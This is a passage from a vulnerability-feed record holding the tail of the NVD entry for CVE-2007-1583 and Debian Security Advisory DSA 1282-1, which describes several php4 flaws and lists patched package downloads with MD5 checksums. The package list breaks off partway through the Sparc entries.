invoke available PHP scripts with register_globals functionality that is not detectable by these scripts, as demonstrated by forcing a memory_limit violation.", "modified": "2018-10-30T12:25:35", "published": "2007-03-21T19:19:00", "id": "CVE-2007-1583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1583", "title": "CVE-2007-1583", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:26", "bulletinFamily": "unix", "description": "- 
--------------------------------------------------------------------------\nDebian Security Advisory DSA 1282-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 26th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-1286 CVE-2007-1380 CVE-2007-1521 CVE-2007-1711 CVE-2007-1718 CVE-2007-1777\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2007-1286\n Stefan Esser discovered an overflow in the object reference handling\n code of the unserialize() function, which allows the execution of\n arbitrary code if malformed input is passed from an application.\n\nCVE-2007-1380\n Stefan Esser discovered that the session handler performs\n insufficient validation of variable name length values, which allows\n information disclosure through a heap information leak.\n\nCVE-2007-1521\n Stefan Esser discovered a double free vulnerability in the\n session_regenerate_id() function, which allows the execution of\n arbitrary code. \n\nCVE-2007-1711\n Stefan Esser discovered a double free vulnerability in the session\n management code, which allows the execution of arbitrary code. 
\n\nCVE-2007-1718\n Stefan Esser discovered that the mail() function performs\n insufficient validation of folded mail headers, which allows mail\n header injection.\n\nCVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP archives\n performs insufficient length checks, which allows the execution of\n arbitrary code.\n\nFor the oldstable distribution (sarge) these problems have been fixed in\nversion 4.3.10-20.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 4.4.4-8+etch2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.4.6-1. php4 will be removed from sid; thus you are strongly\nadvised to migrate to php5 if you prefer to follow the unstable\ndistribution.\n\nWe recommend that you upgrade your PHP packages. Packages for the arm,\nm68k and mipsen architectures are not yet available. They will be\nprovided later.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Alpha architecture:\n\n
http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 20546 44433db159ce2055eda156352e915036\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 25460 63b6c0c5e0b7f2f271b21f05e0138dfe\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 37336 0254818c114152834e45ccb8edbb216d\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 8888 46e9aee043bdb6388a1e347358771d92\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 5006 f058cd10e53c5b31c2a9a364d0ac4b33\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 10980 9c74116baeddc1a85f79af6f4a38f486\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 19650 b50360bc8a4d11143e8b4bbb64f75783\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 14576 a11b82813c14119d2f7220272556a47e\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 1646848 9d271508da7b3ae06647f13135872a83\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 1647864 accc438a407488282fe5b6f803a13b8c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 3254692 daf6d156987b8d59016d3c2e52effe0a\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 1635340 1ceb7d4bc2bbdcbf1c13b80f317320e7\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 206674 34cbac376d754239e1ed4d5df1202213\n 
http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 15808 e38bcdabd21e711bc03100cf5c4931cf\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 201188 9a18453d1a070cdb37f5546a045fa989\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 39478 24462937f3a744106b4ad81d4407557d\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 32334 fb37ee9225a4f1bb588edc79305d8901\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 35258 e5a992bd795f0c4d3de92a200515522a\n http://security.debian.org/pool/updates/main/p/php4/php4-interbase_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 24168 dc4eb1589306847060c1ec3a998e8d53\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 18622 7b1808aa8631b9edebac774032575762\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 15622 1bc9e687cc114b5b87cc45748a004a81\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 14024 7282efbf62681b87af448449ab0000a2\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 5246 ef49d36f7228e29afc913e79d9d0190c\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 20580 b7c241e7d359e0341b010789c20488b0\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 26126 e53a56fdc1a4ef2f9b540bc295081e0a\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 36016 1c57d799e799e6fa3acc646aa83bca6b\n 
http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 9258 f4480f2ed2a578dc30d0e0a14f58ebc8\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 4972 529178a3895d7134b9c135ab6f7b667d\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 11030 5d2a6975b4f8980a730648470b50de6e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 19126 375121679c471a4309cac01a75db36fb\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 14492 6dfd10f810ce3398c207f91053ab92d3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 1741898 db4b84e1651cf8874d35e9a22cdcc275\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 1743310 882fbadc6574ba7f0a190b4e03dc914c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 3402194 7a4b62e4e7b5568c360deb716c940a42\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 1711424 32ad2d9aa62bd09117a6b35df7e60861\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 206672 756fcbfc6c20dbd3ccf4dcc240491a5f\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 18140 889f1f3f6cbc1b7200fde1d3c6d43453\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 201276 898508b406eca8022f70c98358a82cc2\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 40560 2c50dc9740062744183b25df3596a432\n 
http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 34892 8fa487e861202b6ccd4c25be533427a1\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 38292 9c85a3c29ad74a8942e6750c6facae27\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 20222 52bf304d8bdf226f741d0e5ce3f7d6c1\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 16200 3c0cc023a03f7b292dda79a14fdf7d6e\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 15676 6888e8f11db9d2e496470127b40710e6\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 5796 81283d5aebf3d17664b002e2dcfa5d56\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 21252 6a5f22ca73d04ed127081d8048b9a1bd\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 27418 74dace6a114a6e8c5679b5aa4f7d6955\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 39400 a9bdf7a111e37cb712751e838801fb5b\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 9644 e4f30f55fa7b7b748136bd5389202a09\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 5456 4a2c85ac687b09ffe094e3d59362b83f\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 11552 92474800f35942ee87e35584b2de0a75\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 20638 1b4c010aafb36174d36d8bc4f6fbb4de\n 
http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 15656 01c39f82b3ba39f8df4c7469e03c1a05\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 1595272 f6b3ab3222f83cbf75f577248aee1087\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 1596798 cec7ac4cbab8d7565d699acbe9e68998\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 3175408 455c915590b032e75f0f90c68c39f7a9\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 1596654 6a930288e4655d2439f6974d307dd770\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 206676 743f2b0a08fffcfa7ab612e6bbd7cc37\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 15920 34cb3155e53f1d4055c0831a5e9bc38c\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 201168 3620aafdf8b8079d99958fa940239bf6\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 35032 07ee9f476bda386d11f5f8d8c3ddcbe8\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 29638 8c47e08d7cbeedeae8b2522487054b5a\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 33232 4ebacc751c2a446eb578bef9a56ead7b\n http://security.debian.org/pool/updates/main/p/php4/php4-interbase_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 23148 f7e325286fbe7d75febf8ade72d03ec3\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 17050 8b0ea78a6d8f547826019450246db02f\n 
http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 14058 8041a27b06f19df4a6c8fa3f56382505\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 13156 a747fd85802631daa9a83c818b6ce2d0\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 5036 3e141df6e0c1dd20b51fb7783aac2291\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 18544 5c790509e5c074fdbe07bc614f9cfb04\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 24546 b6cda3e759e0e881aec3eeb1bfe7a9ae\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 33832 df9b0ca3554ed3c2be8cf746284773a0\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 8430 74387be9eb05087703bdb9e75b44f898\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 4754 f0239f514b158e2418543f3e0f9bf4e6\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 10256 e7a53228b63aec8df41e1bce1c8ffc47\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 18056 f14a8e5a66e602dabf593d2715b093bd\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 13192 5b8312c1e70d3e87484da144acd0003f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 2004894 ab749e0e311549099a702b0062c6f8a0\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 2006788 5028ed94b0eebc921d4f413eb3ae37d4\n 
http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 4007736 54b5c44e4f621340765ddebdb63704cd\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 2008990 00566529046003ec3ae24cfe7ec29aa2\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 206668 d28b6a8c16cfae4cfdd01581c0f03084\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 20738 b2895d40d70c94972f5c15b14ba878bb\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 201174 de4d90f9a2cc3c16f9860857dbaa87fd\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 53272 ff2d5575c809ca97af182a16eee48d45\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 44078 b343a57d52652614db1b6f3df71e5d9a\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 45454 0965dc7d3fc9679653cd94f45b0a3c21\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 24170 8d3f2edddeaa7d874ae648eb5582f50a\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 19672 10e5f9e76a716d1d3036e308078e05e2\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 17872 822f7784ece29192a8f48eb1d834383f\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 6480 21a782fb775bc4707bedc376d4ce6420\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 26542 74e3c80ba89a42117287aa57ccfdec12\n 
http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 35078 aee8e05b9583f43f8672d2a80731eccd\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 51246 306dc27eaa6dc96d8f613266432da20c\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 11242 8d45f209aba02b115c5359039da3a018\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 6186 93ac21140e18bf281f206baf24a9fab1\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 13812 29e266f9f3494348e9b8ef206cf23bfe\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 26668 5fc50bd5deff61adc220253920e64ed1\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 19102 157ea202d99c6d21fd806a6ed195d662\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 1647652 befe8bad7c449ee2490b30ce4372d9e6\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 1648892 d44eb4bf77e9ebc2ac4a885c4cbd85ea\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 3256780 66349b17fc019cd69d2d68b697692678\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 1635578 999078d2125f8bc9120fabcf5acc0c40\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 206686 67e487b96c5093d98552302c080dc456\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 17798 569e702e11dc463656aaa2f1c27a3988\n 
http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 201192 5f67b85e6a86365a7b78e01b600c498b\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 37712 5c7f1feb667d89737ca0088e06943f2c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 32320 1113bbad7c314e9b7a6206dbff434ed8\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 34532 d42829e744c489fd8911fe1ebcf36d92\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 18968 01ceddae00980cc3160e26eae3d2c2d2\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 15836 ccd27d16fbfc91084604e7216224a7ef\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 15114 bebc4caf1df8586e52705644d4180257\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 6734 e979f5387b52058ba4416ac0d2921c84\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 20306 e314ad6c6de13892ba5b50b06f2a2d92\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 26100 f310054ab13be80a58219b6e4c533833\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 36098 8e15c8249f926a9004126770c47a8ebe\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 10056 3ad99bef49afc5fb58fb461b9104889f\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 6356 93fb31217c6a87a8cf386127d6ffb9f1\n 
http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 11874 70c9f08fb41f0f46cb6ea15bd6065c9e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 19960 374e46e99b31c4ed125123e78a32fa07\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 15340 1e363824557da7abdbeabdd50467d4d3\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 1703728 7a357558fa111d555010b73dca63b98b\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 1704602 9aa12379070aaea5055218573bf7fda2\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 3350582 12ad275d7fc0463d8e8b421f5ce0a0bf\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 1683348 4cbc6f6015d5b440be0750884daa3404\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 206666 cad007391ebe3db957e105c9c33f05d6\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 15902 7ed5f38e84292c4258fd5bbdfff36657\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 201170 9bf433e8ad75c24efbad44f054bd8341\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 39108 ba2355ef46d5afdb4b317951649b6beb\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 31618 c60a0770e653a29cded76bd507e67b1e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 35520 035cd5b20d08e6d504583e62ab5f60b8\n 
http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 19172 75959a74edb16edf761b8f9e7affce1f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 14402 e47f68e47beba84c01bf828cc82bf94f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 13880 60cf41016cd722d1ca0264d5257b85f4\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 5468 7d07521218d106afced0b61a7ff6f32d\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 20732 8cfa07811e333937bf84660c96bf650b\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 26798 039c24f8758c9c13038fb609b7ac5c54\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 37598 c832e867a76ad0b2a16089fffa17ea74\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 9078 8d0bccbba2724513de76463f049e6637\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 5102 5255e4d922f0d418425710a7f76ea9f3\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 11104 41dda15e11e7c917357c7b7cf8744f06\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 19370 4e082af806fb59041f2f668bdcd0c4b5\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 14634 d2c47f8c8634059e63fefb76288f8913\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 1599254 5b82e80cd1b4d54e9f6d117ecf091f3e\n 
http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 1601104 925d1526e4b38ab7f5e26551d5fd8f66\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 3148360 f49ba54ad3270e0cf423ae97001ff99c\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 1583578 e6961941824dc722a88371b99575f8de\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 206668 80e69d05cc0cdf68ae171e08757cec4a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 16072 f943df09cd571878145a8f9e91c5dafd\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 201184 afd5c512f9e3b8ee75be5732fb132a6c\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 33634 ee725113957e22d6c9bbd3c1eed76d58\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 28798 6f383b043805b358468d42a136f09eef\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 31566 7f520b76abdea4180498b0653c92dc63\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 16218 0d469be82c1a55b38c8d4ddbead33e4c\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 13494 